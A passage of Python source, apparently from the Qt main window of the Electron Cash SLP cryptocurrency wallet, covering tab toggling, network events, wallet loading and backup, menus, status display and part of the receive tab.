# forceStatus = 2 , force hide
if forceStatus==1:
show=True
elif forceStatus==2:
show=False
else:
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
def load_wallet(self):
self.wallet.thread = TaskThread(self, self.on_error, name = self.wallet.diagnostic_name() + '/Wallet')
self.wallet.ui_emit_validity_updated = self.slp_validity_signal.emit
self.update_recently_visited(self.wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.update_token_type_combo()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
if self.is_slp_wallet:
self.toggle_cashaddr(2, True)
self.toggle_tab(self.slp_mgt_tab, 1)
self.toggle_tab(self.slp_history_tab, 1)
else:
self.toggle_cashaddr(1, True)
self.update_receive_address_widget()
self.address_list.update()
self.utxo_list.update()
self.slp_mgt_tab.update()
self.slp_history_tab.update()
self.update_cashaddr_icon()
run_hook('load_wallet', self.wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def _warn_slp_prefers_slp_wallets_if_not_slp_wallet(self):
if not self.is_slp_wallet and not self.non_slp_wallet_warning_shown:
msg = '\n\n'.join([
_("WARNING: SLP Tokens Disabled."),
_("SLP tokens were detected in this older style wallet file and this version does not allow use of SLP tokens for your protection."),
_("Please install version 3.4.6 to create a new SLP wallet file and then transfer the tokens from this wallet file to the new 3.4.6 style wallet file."),
_("Why? This is because Electron Cash SLP versions 3.4.3 and later all include a significant security improvement for SLP tokens. That is, all standard wallet files created with 3.4.3 and later use BIP-44 key derivation path m/44'/245' to reduce the risk of burning SLP tokens. Taking no action could result in burning your tokens if this wallet's seed is imported into a non-SLP aware wallet."),
_('''If you're wondering "what do I have to do?":'''),
_("If you want to recover the SLP tokens in this wallet file you need to install version 3.4.6 of this software and follow the instructions provided above.")
])
self.show_warning(msg, title=_("SLP Tokens Detected in a Non-SLP Wallet"))
self.non_slp_wallet_warning_shown = True
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
destroyed_print_error(menubar)
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("Open &Recent"))
file_menu.addAction(_("&Open") + "...", self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore") + "...", self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy As") + "...", self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("&Delete") + "...", self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close).setShortcut(QKeySequence.Quit)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys, QKeySequence("Ctrl+I"))
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password") + "...", self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("Private Keys"))
self.private_keys_menu.addAction(_("&Sweep") + "...", self.sweep_key_dialog).setDisabled(True) # always disable in SLP for now
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import") + "...", self.do_import_privkey)
self.export_menu = self.private_keys_menu.addMenu(_("&Export"))
self.export_menu.addAction(_("&WIF Plaintext") + "...", self.export_privkeys_dialog)
self.export_menu.addAction(_("&BIP38 Encrypted") + "...", self.export_bip38_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses") + "...", self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild History") + "...", self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("Scan &More Addresses..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import") + "...", self.do_import_labels)
labels_menu.addAction(_("&Export") + "...", self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("&Contacts"))
contacts_menu.addAction(_("&New") + "...", self.new_contact_dialog)
contacts_menu.addAction(_("Import") + "...", lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export") + "...", lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import") + "...", lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export") + "...", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("&Find"), self.toggle_search, QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Refresh GUI"), self.update_wallet, QKeySequence("Ctrl+R"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
if self.is_slp_wallet:
add_toggle_action(view_menu, self.slp_mgt_tab)
add_toggle_action(view_menu, self.slp_history_tab)
tools_menu = menubar.addMenu(_("&Tools"))
prefs_tit = _("Preferences") + "..."
a = tools_menu.addAction(prefs_tit, self.settings_dialog, QKeySequence("Ctrl+,") ) # Note: on macOS this hotkey sequence won't be shown in the menu (since it's reserved by the system), but will still work. :/
if sys.platform == 'darwin':
# This turns off the heuristic matching based on name and keeps the
# "Preferences" action out of the application menu and into the
# actual menu we specified on macOS.
a.setMenuRole(QAction.NoRole)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network") + "...", lambda: gui_object.show_network_dialog(weakSelf()), QKeySequence("Ctrl+K"))
tools_menu.addAction(_("Optional &Features") + "...", self.internal_plugins_dialog, QKeySequence("Shift+Ctrl+P"))
tools_menu.addAction(_("Installed &Plugins") + "...", self.external_plugins_dialog, QKeySequence("Ctrl+P"))
if sys.platform in ('linux', 'linux2', 'linux3'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware Wallet Support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/Verify Message") + "...", self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/Decrypt Message") + "...", self.encrypt_message)
tools_menu.addSeparator()
tools_menu.addAction(_("Upload a file using BFP"), lambda: BitcoinFilesUploadDialog(self, None, True, "Upload a File Using BFP"))
tools_menu.addAction(_("Download a file using BFP"), lambda: BfpDownloadFileDialog(self,))
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to Many"), self.paytomany, QKeySequence("Ctrl+M"))
raw_transaction_menu = tools_menu.addMenu(_("&Load Transaction"))
raw_transaction_menu.addAction(_("From &File") + "...", self.do_process_from_file)
raw_transaction_menu.addAction(_("From &Text") + "...", self.do_process_from_text, QKeySequence("Ctrl+T"))
raw_transaction_menu.addAction(_("From the &Blockchain") + "...", self.do_process_from_txid, QKeySequence("Ctrl+B"))
raw_transaction_menu.addAction(_("From &QR Code") + "...", self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("About Qt"), self.app.aboutQt)
help_menu.addAction(_("&Check for Updates"), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official Website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug..."), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to Server") + "...", self.donate_to_server)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{}:{}?message=donation for {}'
.format(networks.net.CASHADDR_PREFIX, d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash SLP",
"<p><font size=+3><b>Electron Cash SLP</b></font></p><p>" + _("Version") + f" {self.wallet.electrum_version}" + "</p>" +
'<p><span style="font-size:11pt; font-weight:500;">' + "Copyright © 2017-2019<br>Electron Cash LLC & The Electron Cash Developers" + "</span></p>" +
'<p><span style="font-weight:200;">' +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system.") +
"</span></p>"
)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=https://github.com/simpleledger/Electron-Cash-SLP/issues>https://github.com/simpleledger/Electron-Cash-SLP/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
sats_per_byte = format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1))
return _('{sats_per_byte} sat/byte').format(sats_per_byte=sats_per_byte)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
"seed_ok" : QIcon(":icons/seed.png"),
"seed_warning" : QIcon(":icons/seed_warning.png")
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
text = ""
if not self.is_slp_wallet:
text += "Tokens Disabled - "
else:
token_id = self.slp_token_id
try:
d = self.wallet.token_types[token_id]
except (AttributeError, KeyError):
pass
else:
bal = format_satoshis_nofloat(self.wallet.get_slp_token_balance(token_id, { 'user_config': { 'confirmed_only': False } })[0],
decimal_point=d['decimals'],)
text += "%s Token Balance: %s; "%(d['name'], bal)
c, u, x = self.wallet.get_balance()
text += _("BCH Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text += " " + ( _("[%d unverified TXs]") % n_unverif )
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
# Provide extra warning and instructions to user if he/she has tokens in a non-SLP wallet type.
if not self.is_slp_wallet:
locked_in_slp = self.wallet.get_slp_locked_balance()
if locked_in_slp > 0:
self._warn_slp_prefers_slp_wallets_if_not_slp_wallet()
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
addr_format = self.config.get('addr_format', 1)
self.setAddrFormatText(addr_format)
self.status_button.setIcon( icon )
self.status_button.setStatusTip( status_tip )
if self.wallet.has_seed():
if self.wallet.storage.get('wallet_seed_needs_backup'):
self.seed_button.setIcon(icon_dict["seed_warning"])
self.seed_button.setToolTip(_("Seed Requires Backup!"))
self.seed_button.setStatusTip(self.seed_button.toolTip())
else:
self.seed_button.setIcon(icon_dict["seed_ok"])
self.seed_button.setToolTip(_("Seed"))
self.seed_button.setStatusTip(None)
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def create_slp_history_tab(self):
from .slp_history_list import HistoryList
self.slp_history_list = l = HistoryList(self)
return self.create_list_tab(l)
def show_address(self, addr, *, parent=None):
parent = parent or self.top_level_window()
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def addr_toggle_slp(self, force_slp=False):
def present_slp():
self.toggle_cashaddr(2, True)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
if force_slp:
present_slp()
return
if Address.FMT_UI == Address.FMT_SLPADDR:
self.toggle_cashaddr(1, True)
self.receive_token_type_combo.setCurrentIndex(0)
else:
present_slp()
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
if self.is_slp_wallet:
self.show_slp_addr_btn = QPushButton(_('Show Token Address'))
self.show_slp_addr_btn.clicked.connect(self.addr_toggle_slp)
grid.addWidget(self.show_slp_addr_btn, 1, 1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_message_e, 2, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_opreturn_e, 3, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 3, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
msg = _('Select the SLP token to Request.')
self.receive_token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
